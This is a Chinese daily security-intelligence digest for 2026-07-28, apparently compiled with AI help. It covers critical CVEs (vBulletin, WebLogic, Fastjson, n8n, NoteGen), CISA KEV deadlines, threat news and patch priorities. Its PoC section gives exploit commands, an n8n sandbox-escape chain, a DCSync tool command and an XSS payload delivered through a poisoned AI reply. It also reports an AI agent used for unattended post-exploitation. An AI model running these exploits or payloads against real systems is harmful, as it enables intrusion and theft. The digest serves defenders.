每日安全情报报告 · 2026-07-28

📅 2026/7/28 15:41:07
每日安全情报报告 · 2026-07-28
每日安全情报报告 · 2026-07-28由 AI 整理发布一、最新高危漏洞1. CVE-2026-61511 — vBulletin 预认证远程代码执行 ⚠️ PoC 已公开项目详情CVE 编号CVE-2026-61511漏洞类型代码注入CWE-94PHP eval() 注入受影响组件vBulletin 6.x6.2.1 及更早 / 6.1.6 及更早 / 5.x 至 5.7.5CVSS 评分9.8Critical在野利用暂未确认在野利用PoC 已于 7/27 公开补丁状态vBulletin 6.2.27/1 发布已修复旧版本需应用安全补丁漏洞详情漏洞位于 vBulletin 模板引擎的vB5_Template_Runtime::runMaths()方法中。该方法将弱过滤的用户输入直接传递给 PHP 的eval()函数。攻击者通过公共路由ajax/render/pagenav发送未认证请求利用phpfuck编码技术仅使用数字、括号、运算符和 XOR绕过字母过滤器重构 PHP 的system()函数并执行任意操作系统命令。无需任何账户或用户交互。NVD 详情SSD Secure Disclosure 公告阅读原文The Hacker News奇安信 CERT 通告2. CVE-2026-60206 — Oracle WebLogic Server SAML 认证绕过项目详情CVE 编号CVE-2026-60206漏洞类型认证缺失CWE-306受影响组件Oracle WebLogic Server 12.2.1.4.0 / 14.1.1.0.0 / 14.1.2.0.0 / 15.1.1.0.0CVSS 评分9.9Critical在野利用暂未确认在野利用补丁状态Oracle July 2026 CPU 已修复漏洞详情Oracle WebLogic Server 的 SAML 认证机制存在认证绕过漏洞。低权限攻击者通过网络访问 SAML 接口即可绕过认证控制冒充合法用户并可能获得 WebLogic Server 管理员权限。攻击范围可显著影响其他产品Scope Change。同期 CPU 还修复了 CVE-2026-60198T3/IIOP 未认证接管和 CVE-2026-60199HTTP 未认证接管。NVD 详情Oracle July 2026 CPUTenable 详情PoC 批量扫描器GitHub3. CVE-2026-56155 — Microsoft ADFS 本地提权 ⚠️ CISA KEV · 今日截止项目详情CVE 编号CVE-2026-56155漏洞类型访问控制粒度不足受影响组件Microsoft Active Directory Federation ServicesADFSCVSS 评分7.8High在野利用✅ CISA KEV 确认在野利用BOD 截止日2026-07-28今日漏洞详情ADFS 存在访问控制粒度不足漏洞授权攻击者可进行本地权限提升。CISA 于 7/14 将其加入 KEV 目录要求联邦机构在 7/28 前完成修复。互联网暴露或高信任联合服务器应优先处置并在重建前保留认证/审计证据。CISA KEV 详情NVD 详情MSRC 公告4. CVE-2026-16723 — Fastjson 1.x RCE ⚠️ 在野利用 · 无补丁项目详情CVE 编号CVE-2026-16723漏洞类型远程代码执行SSRF /proc/self/fd 绕过受影响组件Fastjson 1.2.68 ~ 1.2.83含此前认为安全的 1.2.83CVSS 评分9.0Critical在野利用✅ 已确认多行业遭攻击补丁状态1.x 分支无补丁建议迁移至 fastjson2漏洞详情FearsOff 研究人员发现 fastjson 1.2.83此前认为 AutoType 禁用后安全存在 RCE 漏洞。攻击链利用类查找函数中的盲 SSRF结合读取/proc/self/fd中仍打开的临时 jar 文件绕过 Java 9 更严格的类名限制。影响 Spring Boot fat-jar 部署。Imperva 和 ThreatBook 已报告多行业遭攻击。阅读原文FearsOffNVD 详情CyberSecBrief 分析5. CVE-2026-17497 — NoteGen 任意 OS 命令执行 ⚠️ PoC 已公开项目详情CVE 编号CVE-2026-17497漏洞类型OS 命令注入CWE-78受影响组件NoteGen 0.32.0Tauri 应用CVSS 评分8.3High在野利用暂未确认PoC 已公开补丁状态0.32.0 已修复漏洞详情NoteGen 的 Tauri shell 插件配置过于宽松允许应用 webview 中的 JavaScript 执行任意 bash 和 python 命令。与 CVE-2026-17496AI 聊天渲染未消毒 XSS组合利用时攻击者可通过影响 AI 模型响应实现完整 RCE——投毒的 AI 回复直接导致系统被接管。NVD 详情阅读原文Enigma Daily Digest6. n8n 表达式沙箱逃逸 — GHSA-gv7g-jm28-cr3m项目详情漏洞编号GHSA-gv7g-jm28-cr3m漏洞类型沙箱逃逸 → OS 命令执行受影响组件n8n 2.31.x 2.31.5/ 2.32.x 2.32.1CVSS 评分8.7High在野利用暂未确认补丁状态2.31.5 和 2.32.1 已修复漏洞详情Security Joes 在测试 n8n 2 月修复的 CVE-2026-27577 时发现残余逃逸路径。利用箭头函数简洁体中的裸标识符绕过沙箱标识符重写器再通过Reflect.get()绕过静态属性名检查恢复process.getBuiltinModule加载child_process在主机执行命令。任何拥有工作流创建/修改权限的认证用户均可利用。阅读原文The Hacker NewsFreeBuf 深度分析GitHub 安全公告7. CVE-2026-8933 — Ubuntu snap-confine 本地提权项目详情CVE 编号CVE-2026-8933漏洞类型竞态条件 → 本地提权CWE-362受影响组件Ubuntu Desktop 24.04 / 25.10 / 26.04默认安装CVSS 评分7.8High在野利用暂未确认补丁状态Canonical 已发布安全更新漏洞详情snap-confine 组件在沙箱初始化过程中存在竞争条件。本地低权限用户可结合 FUSE 挂载及符号链接竞争向系统目录植入恶意 udev 规则最终以 Root 权限执行任意代码。影响默认安装的 Ubuntu Desktop需检查实际安装的 snapd 版本而非仅依赖发行版版本号。NVD 详情Snap 安全文档阅读原文一景实验室8. CVE-2026-61511 之外的其他 vBulletin / Oracle July CPU 漏洞汇总CVE产品CVSS类型补丁CVE-2026-60198WebLogicT3/IIOP9.9未认证接管July CPUCVE-2026-60199WebLogicHTTP9.9未认证接管July CPUOracle July 2026 CPU 完整公告Tenable Nessus 插件二、最新漏洞 PoCPoC 1: CVE-2026-61511 — vBulletin 预认证 RCE PoC来源SSD Secure Disclosure / EgiX7/27 公开GitHub/参考SSD Secure Disclosure 公告使用步骤# 1. 获取 PoC通过 SSD 公告下载或参考分析文章 # 2. 修正 PoC 中的一处字符拼写错误字母应为数字trivial fix # 3. 执行 python3 vbulletin_exploit.py -u http://target-forum.com/ajax/render/pagenav # 4. 验证命令执行 python3 vbulletin_exploit.py -u http://target-forum.com -c id技术要点利用ajax/render/pagenav路由通过pagenav[pagenumber]参数注入{vb:math}模板标签进入runMaths()的eval()调用。使用phpfuck编码技术仅数字运算符XOR重构 PHPsystem()函数。PoC 2: CVE-2026-60206 — Oracle WebLogic SAML 认证绕过 PoC 批量扫描器来源GitHub imbas0077/24 公开GitHubimbas007/POC-CVE-2026-60206使用步骤# 1. 克隆仓库 git clone https://github.com/imbas007/CVE-2026-60206.git cd CVE-2026-60206 # 2. 安装依赖 pip install -r requirements.txt # 3. 单目标检测检测版本 SAML 端点 python3 CVE-2026-60206-exploit.py -t https://target:7002 --detect # 4. 完整利用所有攻击向量 python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode all -u weblogic # 5. 批量扫描 python3 CVE-2026-60206-exploit.py -l targets.txt --exploit --no-verify -T 30 -o results.json攻击模式unsigned未签名 SAML 注入/xswXML 签名包装 4 变体/nameidNameID 注入/combo组合攻击/audienceAudienceRestriction 绕过/replaySAML 响应重放/all全部执行PoC 3: n8n 沙箱逃逸 PoCGHSA-gv7g-jm28-cr3m来源Security Joes7/22 修复后公开参考The Hacker News 分析利用原理// 1. 箭头函数简洁体绕过标识符重写 // 简洁体中的裸标识符 process 未被重写为沙箱值 x process // process 解析为真实 Node.js 全局变量 // 2. Reflect.get() 绕过静态属性名检查 Reflect.get(process, getBuiltinModule) // 3. 加载 child_process 并执行命令 process.getBuiltinModule(child_process).execSync(id)使用步骤# 1. 在 n8n 工作流中创建/编辑节点 # 2. 在表达式字段中注入恶意箭头函数 Reflect.get() 链 # 3. 触发工作流执行 # 4. 验证命令执行检查 n8n/Node.js 子进程是否产生 shellPoC 4: CVE-2026-54121 — Certighost AD CS 完整利用工具来源GitHub Gist H0j3n7/24 更新GitHubH0j3n Certighost Gist使用步骤# 1. 下载利用工具 # 2. 以低权限域用户身份执行 python3 certighost.py -d domain.local -u lowpriv -p Password123 # 3. 冒充域控制器并 DCSync 提取 krbtgt python3 certighost.py -d domain.local -u lowpriv -p Password123 --dcsync技术要点利用 AD CS 证书服务漏洞低权限域用户可冒充域控制器身份通过 DCSync 提取 krbtgt 哈希实现域控完全失陷。PoC 5: CVE-2026-17497 — NoteGen Tauri Shell 命令执行来源Enigma Daily Digest / GitHub Advisory7/27 报告参考Enigma Daily Digest使用步骤# 1. 结合 CVE-2026-17496AI 聊天 XSS # 2. 在 AI 模型回复中注入恶意 JavaScript # 3. 恶意 JS 通过 Tauri shell 插件执行系统命令 # 示例 payload通过 AI 回复投毒 # scriptwindow.__TAURI__.shell.execute(bash, [-c, id])/script三、网络安全最新文章1. vBulletin CVE-2026-61511: Public Pre-Auth RCE Exploit Now Available摘要7/27 公开的 PoC 展示了如何通过未认证请求到达 vBulletin 模板引擎中的 PHPeval()函数并执行任意代码。影响 6.2.1 及更早版本无需账户或用户交互。vBulletin 已在 6.2.2 中修复但许多运营方尚未升级。阅读原文The Hacker NewsField Effect 分析2. n8n Patches High-Severity Sandbox Escape Allowing Authenticated OS Command Execution摘要n8n 修复了 GHSA-gv7g-jm28-cr3mCVSS 8.7表达式沙箱逃逸漏洞允许任何拥有工作流创建/修改权限的认证用户以 n8n 进程权限执行 OS 命令。Security Joes 在测试 2 月修复的 CVE-2026-27577 时发现残余逃逸路径。阅读原文The Hacker NewsFreeBuf 中文分析3. Hermes AI Agent Deployed for Unattended Post-Exploitation at Thai Finance Ministry摘要攻击者使用开源 Hermes AI 代理的无人值守YOLO模式对泰国财政部进行自动化后渗透攻击。Hunt.io 发现攻击者误公开的日志目录包含 585 个文件和 470MB 数据——利用代码、Web Shell、窃取的凭据和 Hermes 调用日志显示 AI 代理执行了内核漏洞扫描、LinPEAS 枚举和递归文件系统遍历。阅读原文BleepingComputerHunt.io 详细报告4. TELESHIM: East Asia-Linked Threat Actor Targets Middle East Governments via Telegram C2摘要Zscaler ThreatLabz 披露了一个与东亚威胁行为者关联的攻击行动针对中东政府实体。攻击链以 ISO 文件开始侧加载 TELESHIM——一个滥用 Telegram API 进行 C2 通信的 Windows 后门同时部署 MIXEDKEY 和 BINDCLOAK 二阶段载荷。阅读原文The Hacker News5. Hacked Hotel and Conference Centre Wi-Fi Gateways Used to Harvest Corporate Credentials摘要攻击者入侵了美国、印度和沙特阿拉伯的酒店和会议中心 Wi-Fi 网关使用中间人攻击技术拦截流量并窃取商务旅客的企业凭据。活动自 2026 年 6 月起持续进行。阅读原文SecurityWeek6. Coca-Cola Confirms Fairlife Data Breach After Anubis Ransomware Attack摘要可口可乐确认其 Fairlife 乳制品子公司在 Anubis 勒索软件攻击后发生数据泄露。攻击于 7/16 披露时暂停了美国 Fairlife 生产设施运营。Anubis 勒索组织声称窃取 1TB 数据并于 7/20 在泄露网站公布。阅读原文SecurityWeek7. Exposed Operator Server Reveals AI-Assisted Phishing Toolkit Behind WebDAV Campaign摘要Rapid7 从一个暴露的钓鱼运营者服务器代号 CodeRRR中恢复 1,048 个文件将 LLM 辅助工具包与活跃的 WebDAV 攻击活动关联。该活动通过虚假政府 ID 查询网站向墨西哥 Windows 用户投递 .NET 信息窃取器。面板记录了 5.5 天内 3,892 个唯一 IP 的 77,098 次请求墨西哥占 82.5%。阅读原文The Hacker News8. GitHub Cuts Bug Bounty Payouts by Half, Moves Top Rewards to Invite-Only VIP Tier摘要GitHub 自 7/27 起将公开漏洞赏金削减至少 50%。严重级发现从 $20,000-$30,000 降至固定 $10,000同时设立仅限邀请的 VIP 层级支付 $30,000。GitHub 表示此举旨在减少低质量提交并让资深研究员更快接触安全工程团队。阅读原文The Hacker NewsFreeBuf 报道9. SourTrade 恶意广告浏览器内组装 PE 文件绕过检测摘要Confiant 披露SourTrade恶意广告活动自 2024 年末活跃假冒 TradingView、Solana 和 Luno 针对交易者。不再投递完成的恶意文件而是指示浏览器获取合法 Bun 运行时并使用 AES-CTR 生成的字节在本地组装恶意可执行文件。覆盖 12 个国家 25 种语言。阅读原文ConfiantCyberSecBrief 分析10. Cl0p 勒索利用 PTC Windchill/FlexPLM CVE-2026-12569 未认证 RCE摘要Cl0p 关联攻击者将 PTC FlexPLM 的预认证漏洞与 Windchill 登录 Servlet 漏洞组合实现未认证 RCE。攻击者利用此链入侵企业 PLM 系统窃取产品设计数据并部署勒索软件。阅读原文CyberSecBrief11. Steam 论坛 ClickFix 分发 XMRig 矿工摘要威胁行为者在 Steam 社区论坛发布虚假故障排除回复诱导用户运行恶意 PowerShell 命令。脚本伪装为msf utility \ PC OptWindows 优化工具实则禁用 Defender 保护并下载 XMRig 加密矿工以 SYSTEM 权限安装为持久化计划任务。阅读原文BleepingComputerEnigma Daily Digest12. GitLab 自托管 18.11.3 Jupyter Notebook RCE PoC 公开摘要DepthFirst 研究人员组合 Oj 原生 JSON 解析器中的两个内存损坏漏洞未检查嵌套栈堆写入原语 键长截断泄露堆指针实现 GitLab CE/EE 15.2.0 至 19.0.1 版本的 RCE。任何能推送提交的认证用户均可利用。影响自托管 GitLab 的 notebook-diff 功能。阅读原文CyberSecBriefDepthFirst 研究13. CISA KEV 7/28 截止CVE-2026-56155 ADFS 本地提权摘要CISA KEV 目录中 CVE-2026-56155Microsoft ADFS 本地提权的 BOD 26-04 修复截止日为今日7/28。该漏洞已确认在野利用授权攻击者可进行本地权限提升。互联网暴露的联合服务器应优先处置。CISA KEV 目录威胁分析threat.wiki14. GitHub 和 PyPI 添加时间冷却机制对抗供应链攻击摘要GitHub 的 Dependabot 现在默认应用 72 小时冷却期后才采用新包更新减少新发布恶意代码的暴露窗口。PyPI 单独阻止维护者在发布 14 天后向版本添加新文件防止投毒可信旧版本。两项措施跟随近期一系列供应链事件。阅读原文BleepingComputerNCSC-FI 公告15. DevMan RaaS 平台曝光专业化勒索即服务运营摘要PRODAFT 记录的 DevMan 平台追踪为 Funky Mantis在一个门户上集中了载荷构建、受害者管理和附属支付。平台明确鼓励附属攻击关键基础设施展现了专业化勒索即服务运营的成熟度。阅读原文CyberSecBriefEnigma Daily Digest四、CISA KEV 重点关注今日截止7/28CVE产品漏洞CVSS状态CVE-2026-56155Microsoft ADFS本地提权7.8⚠️今日截止· 在野利用近期已逾期CVE产品漏洞截止日状态CVE-2026-56164Microsoft SharePoint认证缺失7/17已逾期CVE-2026-15409SonicWall SMA1000SSRF7/17已逾期CVE-2026-15410SonicWall SMA1000代码注入7/17已逾期CVE-2026-58644Microsoft SharePoint反序列化 RCE7/19已逾期CVE-2026-25089Fortinet FortiSandbox命令注入7/19已逾期CVE-2026-39808Fortinet FortiSandbox命令注入7/19已逾期CVE-2026-50522Microsoft SharePoint反序列化 RCE7/25已逾期CVE-2026-16232Check Point SmartConsole认证绕过7/25已逾期CISA KEV 完整目录五、风险态势总结风险维度评估整体威胁等级 高最紧急CVE-2026-56155 ADFS 今日 KEV 截止 在野利用最高风险新漏洞CVE-2026-61511 vBulletin 预认证 RCEPoC 已公开影响 5.x-6.x无补丁高危CVE-2026-16723 Fastjson 1.x RCE在野利用1.x 无补丁AI 安全焦点Hermes AI 代理用于自动化后渗透泰国财政部实战案例供应链趋势GitHub/PyPI 引入冷却机制但 npm/PyPI 攻击持续勒索软件DevMan RaaS 鼓励攻击关键基础设施Anubis 攻击可口可乐 Fairlife建议优先行动立即— 修复 CVE-2026-56155ADFS今日 KEV 截止且在野利用紧急— 升级 vBulletin 至 6.2.2PoC 已公开且攻击门槛极低紧急— 迁移 Fastjson 1.x 至 fastjson21.x 分支无补丁且已遭在野利用高优先— 应用 Oracle July 2026 CPUWebLogic 三个 CVSS 9.9 漏洞高优先— 升级 n8n 至 2.31.5/2.32.1沙箱逃逸可执行 OS 命令常规— 更新 Ubuntu snapdCVE-2026-8933 本地提权审计— 检查 NoteGen 0.32.0AI 回复投毒可导致 RCE部分内容由 AI 辅助生成